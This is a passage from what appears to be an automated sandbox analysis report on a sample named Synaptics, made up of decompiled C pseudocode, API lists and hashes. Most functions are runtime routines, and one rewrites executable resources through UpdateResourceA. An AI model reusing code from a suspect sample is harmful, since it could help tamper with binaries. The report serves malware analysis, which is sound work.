                                                                                                                                                                                                                            					_v788 =  *_v780 & 0x0000ffff;
                                                                                                                                                                                                                            					_t79 = _v788 - 1;
                                                                                                                                                                                                                            					if(_t79 >= 0) {
                                                                                                                                                                                                                            						_t85 = _t79 + 1;
                                                                                                                                                                                                                            						_t96 = 0;
                                                                                                                                                                                                                            						_t97 =  &_v772;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_v796 = _t97;
                                                                                                                                                                                                                            							_push(_v796 + 4);
                                                                                                                                                                                                                            							_t22 = _t96 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v780);
                                                                                                                                                                                                                            							L0040F78C();
                                                                                                                                                                                                                            							E00410638(_v780);
                                                                                                                                                                                                                            							_push( &_v784);
                                                                                                                                                                                                                            							_t25 = _t96 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v780);
                                                                                                                                                                                                                            							L0040F794();
                                                                                                                                                                                                                            							E00410638(_v780);
                                                                                                                                                                                                                            							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                                                                                                                                                                            							_t96 = _t96 + 1;
                                                                                                                                                                                                                            							_t97 = _t97 + 8;
                                                                                                                                                                                                                            							_t85 = _t85 - 1;
                                                                                                                                                                                                                            						} while (_t85 != 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t81 = _v788 - 1;
                                                                                                                                                                                                                            					if(_t81 >= 0) {
                                                                                                                                                                                                                            						_t84 = _t81 + 1;
                                                                                                                                                                                                                            						_t60 =  &_v768;
                                                                                                                                                                                                                            						_t92 =  &_v260;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							 *_t92 =  *_t60;
                                                                                                                                                                                                                            							_t92 = _t92 + 4;
                                                                                                                                                                                                                            							_t60 = _t60 + 8;
                                                                                                                                                                                                                            							_t84 = _t84 - 1;
                                                                                                                                                                                                                            						} while (_t84 != 0);
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            						} while (E00410794(_t83, _t98) != 0);
                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                            					_t83 = _v788 - 1;
                                                                                                                                                                                                                            					if(E00410764(_v788 - 1, _t98) != 0) {
                                                                                                                                                                                                                            						_push( &_v792);
                                                                                                                                                                                                                            						_push( &_v260);
                                                                                                                                                                                                                            						_push(_v780);
                                                                                                                                                                                                                            						L0040F79C();
                                                                                                                                                                                                                            						E00410638(_v780);
                                                                                                                                                                                                                            						E004109E8(_v792);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L15:
                                                                                                                                                                                                                            				_push(_v776);
                                                                                                                                                                                                                            				L0040F320();
                                                                                                                                                                                                                            				return E00410638(_v776);
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            0x00410909
                                                                                                                                                                                                                            0x00410910
                                                                                                                                                                                                                            0x0041091b
                                                                                                                                                                                                                            0x00410923
                                                                                                                                                                                                                            0x0041092a
                                                                                                                                                                                                                            0x00410931
                                                                                                                                                                                                                            0x00410932
                                                                                                                                                                                                                            0x00410937
                                                                                                                                                                                                                            0x00410942
                                                                                                                                                                                                                            0x00410942
                                                                                                                                                                                                                            0x00410950
                                                                                                                                                                                                                            0x00410954
                                                                                                                                                                                                                            0x0041095a
                                                                                                                                                                                                                            0x0041095b
                                                                                                                                                                                                                            0x0041096b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0041089F
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004108BB
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410932
                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041095B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                                                                                                            • Opcode ID: f4434b3e376d3a5606270c734a293c14b68a231df54e7596f913469bd8c2ca55
                                                                                                                                                                                                                            • Instruction ID: 03341164d2f6fde75e1a46505fe440e945d96e45a0ae1fefe7a635db93ae447a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4434b3e376d3a5606270c734a293c14b68a231df54e7596f913469bd8c2ca55
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D412C75A0121D8FCB61EB59C890AC9B3BCAF48314F0041EAE54CE7202DA78AFC58F54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00477370(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                            				int _t53;
                                                                                                                                                                                                                            				char _t56;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t64;
                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				intOrPtr* _t79;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t81 = _t82;
                                                                                                                                                                                                                            				_t83 = _t82 + 0xffffffec;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t81);
                                                                                                                                                                                                                            				_push(0x477494);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t83;
                                                                                                                                                                                                                            				_t61 = BeginUpdateResourceA(E00404E80(_v8), 0);
                                                                                                                                                                                                                            				_v13 = _t61 != 0;
                                                                                                                                                                                                                            				if(_v13 == 0) {
                                                                                                                                                                                                                            					_pop(_t69);
                                                                                                                                                                                                                            					 *[fs:eax] = _t69;
                                                                                                                                                                                                                            					_push(E0047749B);
                                                                                                                                                                                                                            					return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *[fs:eax] = _t83;
                                                                                                                                                                                                                            					_t64 =  *0x49ec78; // 0x3c30000
                                                                                                                                                                                                                            					_t79 = E0041E0D0(_t64, 1, 0xa, _v12);
                                                                                                                                                                                                                            					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
                                                                                                                                                                                                                            					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t79 + 0xc))();
                                                                                                                                                                                                                            					E00403BEC(_t79);
                                                                                                                                                                                                                            					_t47 =  *0x49ec78; // 0x3c30000
                                                                                                                                                                                                                            					FreeLibrary(_t47);
                                                                                                                                                                                                                            					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_v13 = _t53 + 1;
                                                                                                                                                                                                                            					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
                                                                                                                                                                                                                            						_t56 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t56 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v13 = _t56;
                                                                                                                                                                                                                            					_pop(_t75);
                                                                                                                                                                                                                            					 *[fs:eax] = _t75;
                                                                                                                                                                                                                            					_push(E00477479);
                                                                                                                                                                                                                            					return E0040277C(_v24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477457
                                                                                                                                                                                                                            0x00477459
                                                                                                                                                                                                                            0x0047745e
                                                                                                                                                                                                                            0x00477461
                                                                                                                                                                                                                            0x00477464
                                                                                                                                                                                                                            0x00477471
                                                                                                                                                                                                                            0x00477471

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(03C30000,?,?,00000000,00000000,00000000,00477494,?,?,?,00000000), ref: 00477418
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00477433
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$BeginFreeLibrary
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2368538523-0
                                                                                                                                                                                                                            • Opcode ID: 59e7414658dc091205167fef12b51b4d7f9389589d3a1839c4c82dc7da055082
                                                                                                                                                                                                                            • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59e7414658dc091205167fef12b51b4d7f9389589d3a1839c4c82dc7da055082
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v273;
                                                                                                                                                                                                                            				char _v534;
                                                                                                                                                                                                                            				char _v790;
                                                                                                                                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                                                            				intOrPtr _v828;
                                                                                                                                                                                                                            				char _v832;
                                                                                                                                                                                                                            				intOrPtr _v836;
                                                                                                                                                                                                                            				char _v840;
                                                                                                                                                                                                                            				intOrPtr _v844;
                                                                                                                                                                                                                            				char _v848;
                                                                                                                                                                                                                            				char* _v852;
                                                                                                                                                                                                                            				char _v856;
                                                                                                                                                                                                                            				char _v860;
                                                                                                                                                                                                                            				char _v1116;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t40;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr* _t87;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t93 = __fp0;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t73 = __edx;
                                                                                                                                                                                                                            				_t87 = __eax;
                                                                                                                                                                                                                            				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                                                                                                                                            				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                                                                                                                                            					_t40 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                                                                                                                                            					_v12 = E0040CEC4(_t73);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v12 = _t73 - _v820.AllocationBase;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                                                                                                                                                                                            				_t74 = 0x40d050;
                                                                                                                                                                                                                            				_t86 = 0x40d050;
                                                                                                                                                                                                                            				_t83 =  *0x408034; // 0x408080
                                                                                                                                                                                                                            				if(E00403D78(_t87, _t83) != 0) {
                                                                                                                                                                                                                            					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
                                                                                                                                                                                                                            					_t69 = E00409F88(_t74, 0x40d050);
                                                                                                                                                                                                                            					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                                                                                                                                                            						_t86 = 0x40d054;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t51 =  *0x49ddfc; // 0x407dac
                                                                                                                                                                                                                            				_t16 = _t51 + 4; // 0xffd1
                                                                                                                                                                                                                            				_t53 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                                                                                                                                            				E00403B3C( *_t87,  &_v1116);
                                                                                                                                                                                                                            				_v860 =  &_v1116;
                                                                                                                                                                                                                            				_v856 = 4;
                                                                                                                                                                                                                            				_v852 =  &_v273;
                                                                                                                                                                                                                            				_v848 = 6;
                                                                                                                                                                                                                            				_v844 = _v12;
                                                                                                                                                                                                                            				_v840 = 5;
                                                                                                                                                                                                                            				_v836 = _t74;
                                                                                                                                                                                                                            				_v832 = 6;
                                                                                                                                                                                                                            				_v828 = _t86;
                                                                                                                                                                                                                            				_v824 = 6;
                                                                                                                                                                                                                            				E0040A624(_v8,  &_v790, _a4, _t93, "true",  &_v860);
                                                                                                                                                                                                                            				return E00409F88(_v8, _t86);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x0040cfc2
                                                                                                                                                                                                                            0x0040cfcf
                                                                                                                                                                                                                            0x0040cfda
                                                                                                                                                                                                                            0x0040cfe0
                                                                                                                                                                                                                            0x0040cfed
                                                                                                                                                                                                                            0x0040cff3
                                                                                                                                                                                                                            0x0040cffd
                                                                                                                                                                                                                            0x0040d003
                                                                                                                                                                                                                            0x0040d00a
                                                                                                                                                                                                                            0x0040d010
                                                                                                                                                                                                                            0x0040d017
                                                                                                                                                                                                                            0x0040d01d
                                                                                                                                                                                                                            0x0040d039
                                                                                                                                                                                                                            0x0040d04c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: 29d47073ac724d389526f5602c8458d9e302834d195a018ccc538ee601599d13
                                                                                                                                                                                                                            • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29d47073ac724d389526f5602c8458d9e302834d195a018ccc538ee601599d13
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v273;
                                                                                                                                                                                                                            				char _v534;
                                                                                                                                                                                                                            				char _v790;
                                                                                                                                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                                                            				intOrPtr _v828;
                                                                                                                                                                                                                            				char _v832;
                                                                                                                                                                                                                            				intOrPtr _v836;
                                                                                                                                                                                                                            				char _v840;
                                                                                                                                                                                                                            				intOrPtr _v844;
                                                                                                                                                                                                                            				char _v848;
                                                                                                                                                                                                                            				char* _v852;
                                                                                                                                                                                                                            				char _v856;
                                                                                                                                                                                                                            				char _v860;
                                                                                                                                                                                                                            				char _v1116;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t40;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				intOrPtr* _t92;
                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t74 = __edx;
                                                                                                                                                                                                                            				_t92 = __eax;
                                                                                                                                                                                                                            				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                                                                                                                                            				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                                                                                                                                            					_t40 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                                                                                                                                            					_v12 = E0040CEC4(_t74);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v12 = _t74 - _v820.AllocationBase;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                                                                                                                                                                                            				_t75 = 0x40d050;
                                                                                                                                                                                                                            				_t89 = 0x40d050;
                                                                                                                                                                                                                            				_t85 =  *0x408034; // 0x408080
                                                                                                                                                                                                                            				if(E00403D78(_t92, _t85) != 0) {
                                                                                                                                                                                                                            					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
                                                                                                                                                                                                                            					_t69 = E00409F88(_t75, 0x40d050);
                                                                                                                                                                                                                            					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                                                                                                                                                            						_t89 = 0x40d054;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t51 =  *0x49ddfc; // 0x407dac
                                                                                                                                                                                                                            				_t16 = _t51 + 4; // 0xffd1
                                                                                                                                                                                                                            				_t53 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                                                                                                                                            				E00403B3C( *_t92,  &_v1116);
                                                                                                                                                                                                                            				_v860 =  &_v1116;
                                                                                                                                                                                                                            				_v856 = 4;
                                                                                                                                                                                                                            				_v852 =  &_v273;
                                                                                                                                                                                                                            				_v848 = 6;
                                                                                                                                                                                                                            				_v844 = _v12;
                                                                                                                                                                                                                            				_v840 = 5;
                                                                                                                                                                                                                            				_v836 = _t75;
                                                                                                                                                                                                                            				_v832 = 6;
                                                                                                                                                                                                                            				_v828 = _t89;
                                                                                                                                                                                                                            				_v824 = 6;
                                                                                                                                                                                                                            				E0040A624(_v8,  &_v790, _a4, _t105, "true",  &_v860);
                                                                                                                                                                                                                            				return E00409F88(_v8, _t89);
                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                            0x0040cfae
                                                                                                                                                                                                                            0x0040cfb3
                                                                                                                                                                                                                            0x0040cfb7
                                                                                                                                                                                                                            0x0040cfc2
                                                                                                                                                                                                                            0x0040cfcf
                                                                                                                                                                                                                            0x0040cfda
                                                                                                                                                                                                                            0x0040cfe0
                                                                                                                                                                                                                            0x0040cfed
                                                                                                                                                                                                                            0x0040cff3
                                                                                                                                                                                                                            0x0040cffd
                                                                                                                                                                                                                            0x0040d003
                                                                                                                                                                                                                            0x0040d00a
                                                                                                                                                                                                                            0x0040d010
                                                                                                                                                                                                                            0x0040d017
                                                                                                                                                                                                                            0x0040d01d
                                                                                                                                                                                                                            0x0040d039
                                                                                                                                                                                                                            0x0040d04c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: b82e1068cabe4ae57284531c3d153d5948e774c07b80ca1a7813b77d5b851ce1
                                                                                                                                                                                                                            • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82e1068cabe4ae57284531c3d153d5948e774c07b80ca1a7813b77d5b851ce1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E174() {
                                                                                                                                                                                                                            				char _v152;
                                                                                                                                                                                                                            				short _v410;
                                                                                                                                                                                                                            				signed short _t14;
                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				int _t26;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                            				int* _t39;
                                                                                                                                                                                                                            				short* _t41;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *0x49e744 = 0x409;
                                                                                                                                                                                                                            				 *0x49e748 = 9;
                                                                                                                                                                                                                            				 *0x49e74c = 1;
                                                                                                                                                                                                                            				_t14 = GetThreadLocale();
                                                                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                                                                            					 *0x49e744 = _t14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                                                                            					 *0x49e748 = _t14 & 0x3ff;
                                                                                                                                                                                                                            					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				memcpy(0x49b134, 0x40e2c8, 8 << 2);
                                                                                                                                                                                                                            				if( *0x49b0ec != 2) {
                                                                                                                                                                                                                            					_t16 = GetSystemMetrics(0x4a);
                                                                                                                                                                                                                            					__eflags = _t16;
                                                                                                                                                                                                                            					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                                                                                                                                                                            					_t18 = GetSystemMetrics(0x2a);
                                                                                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                                                                                            					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                                                                                                                                                                            					 *0x49e750 = _t31;
                                                                                                                                                                                                                            					__eflags = _t31;
                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                            						return E0040E0FC(__eflags, _t49);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t20 = E0040E15C();
                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                            						 *0x49e751 = 0;
                                                                                                                                                                                                                            						 *0x49e750 = 0;
                                                                                                                                                                                                                            						return _t20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040E0FC(__eflags, _t49);
                                                                                                                                                                                                                            					_t37 = 0x20;
                                                                                                                                                                                                                            					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
                                                                                                                                                                                                                            					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                                                                                                                                                                            					 *0x49e750 = _t32;
                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                            						 *0x49e751 = 0;
                                                                                                                                                                                                                            						return _t23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t24 = 0x80;
                                                                                                                                                                                                                            					_t39 =  &_v152;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *_t39 = _t24;
                                                                                                                                                                                                                            						_t24 = _t24 + 1;
                                                                                                                                                                                                                            						_t39 =  &(_t39[0]);
                                                                                                                                                                                                                            						__eflags = _t24 - 0x100;
                                                                                                                                                                                                                            					} while (_t24 != 0x100);
                                                                                                                                                                                                                            					_t26 =  *0x49e744; // 0x409
                                                                                                                                                                                                                            					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                                                                                                                                                                            					_t18 = 0x80;
                                                                                                                                                                                                                            					_t41 =  &_v410;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						__eflags =  *_t41 - 2;
                                                                                                                                                                                                                            						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                                                                                                                                                                            						 *0x49e751 = _t37;
                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t41 = _t41 + 2;
                                                                                                                                                                                                                            						_t18 = _t18 - 1;
                                                                                                                                                                                                                            						__eflags = _t18;
                                                                                                                                                                                                                            						if(_t18 != 0) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							return _t18;
